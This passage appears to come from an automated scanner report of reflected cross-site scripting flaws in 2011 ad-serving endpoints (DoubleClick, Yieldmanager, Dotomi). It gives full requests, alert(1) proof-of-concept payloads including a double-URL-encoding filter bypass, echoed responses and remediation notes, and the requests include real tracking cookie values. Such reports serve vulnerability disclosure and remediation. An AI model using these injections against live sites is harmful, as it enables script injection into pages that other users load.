GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc24d"-alert(1)-"d0287f2bb97 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e728'-alert(1)-'54ab655354d was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7551
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17ecf'-alert(1)-'9bd825e5b22 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a70"-alert(1)-"52f10523c4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7517
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 was submitted in the admeld_callback parameter. This input was echoed as 3a018';alert(1)//29ac3d5f519 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /v0/admeld-match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; 
bh="b!!!$E!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'
<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"; lifb=ORtsV69Ah<fqyac; ih="b!!!!B!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=.Sexf5_x-bh5ryLshEiqN6hm(mMpyr; 
pv1="b!!!!7!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~"
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Cache-Control: private Content-Length: 261 Content-Type: text/javascript Age: 0 Proxy-Connection: close Server: YTS/1.18.4
document.write('<img width="0" height="0" src="http://tag.admeld.com/match3a018';alert(1)//29ac3d5f519?admeld_adprovider_id=420&external_user_id=0&expiration=1297968783" /><img width="0" height="0" sr ...[SNIP]...
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8cd2'%3balert(1)//13a730e6121 was submitted in the admeld_adprovider_id parameter. This input was echoed as b8cd2';alert(1)//13a730e6121 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78b8cd2'%3balert(1)//13a730e6121&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:02 GMT X-Name: rtb-o06 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19652'%3balert(1)//c53cf824e4b was submitted in the admeld_callback parameter. This input was echoed as 19652';alert(1)//c53cf824e4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match19652'%3balert(1)//c53cf824e4b HTTP/1.1 Host: admeld-match.dotomi.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
